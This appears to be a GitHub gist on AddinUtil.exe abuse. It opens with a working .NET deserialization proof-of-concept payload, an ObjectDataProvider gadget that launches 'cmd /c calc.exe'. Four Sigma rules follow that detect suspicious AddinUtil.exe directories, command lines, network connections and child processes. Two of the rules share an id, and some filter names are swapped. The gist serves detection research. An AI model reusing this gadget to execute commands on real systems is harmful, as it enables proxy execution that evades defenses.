Skip to content

Instantly share code, notes, and snippets.

@SILJAEUROPA
Last active April 18, 2024 18:53
Show Gist options
  • Save SILJAEUROPA/a850d476179d73df230a876944e9f3b1 to your computer and use it in GitHub Desktop.
Save SILJAEUROPA/a850d476179d73df230a876944e9f3b1 to your computer and use it in GitHub Desktop.
Collection of AddinUtil.exe LOLBAS Sigma Signatures and an AddinUtil.exe PoC Payload.
ª» ÿÿÿÿ  ^Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35 BMicrosoft.VisualStudio.Text.Formatting.TextFormattingRunProperties ForegroundBrush  ·<?xml version="1.0" encoding="utf-16"?>
<ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
<ObjectDataProvider.ObjectInstance>
<sd:Process>
<sd:Process.StartInfo>
<sd:ProcessStartInfo Arguments="/c calc.exe" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
</sd:Process.StartInfo>
</sd:Process>
</ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>
title: AddinUtil.exe Execution from Suspicious Directory
id: 74e16e48-667d-4540-893d-e0f100cafc27
status: experimental
description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
references:
- https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
tags:
- attack.defense_evasion
- attack.t1218
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023/09/18
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\addinutil.exe'
filter_64bit:
Image|startswith: 'C:\Windows\Microsoft.NET\Framework64\'
filter_32bit:
Image|startswith: 'C:\Windows\Microsoft.NET\Framework\'
condition: selection and not 1 of filter*
falsepositives:
- Unknown
level: medium
title: AddinUtil.exe Execution with Suspicious Command Line
id: 74e16e48-667d-4540-893d-e0f100cafc27
status: experimental
description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
references:
- https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
tags:
- attack.defense_evasion
- attack.t1218
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023/09/18
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\addinutil.exe'
filter_addinroot:
CommandLine|contains: '-PipelineRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\'
filter_pipelineroot:
CommandLine|contains: '-AddInRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\'
condition: selection and not 1 of filter*
falsepositives:
- Unknown
level: medium
title: AddinUtil.exe Network Connection
id: 3f73cf20-daf9-48ec-ac4d-5e996096c9c0
status: experimental
description: Detects network connections made by the Add-In deployment cache updating utility (AddInutil.exe), which could indicate command and control.
references:
- https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
tags:
- attack.defense_evasion
- attack.t1218
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023/09/18
logsource:
category: network_connection
product: windows
detection:
selection:
Initiated: 'true'
Image|endswith: '\addinutil.exe'
condition: selection
falsepositives:
- Unknown
level: medium
title: AddinUtil.exe with Suspicious Child Process
id: 42e3ad54-a382-4e50-a297-4ee84777bddf
status: experimental
description: Detects suspicious child process of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
references:
- https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
tags:
- attack.defense_evasion
- attack.t1218
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023/09/18
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\addinutil.exe'
filter_werfault_32bit:
Image|endswith: '\Windows\System32\werfault.exe'
filter_werfault_64bit:
Image|endswith: '\Windows\SysWOW64\werfault.exe'
filter_conhost:
Image|endswith: '\Windows\System32\conhost.exe'
condition: selection and not 1 of filter*
falsepositives:
- Unknown
level: medium
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment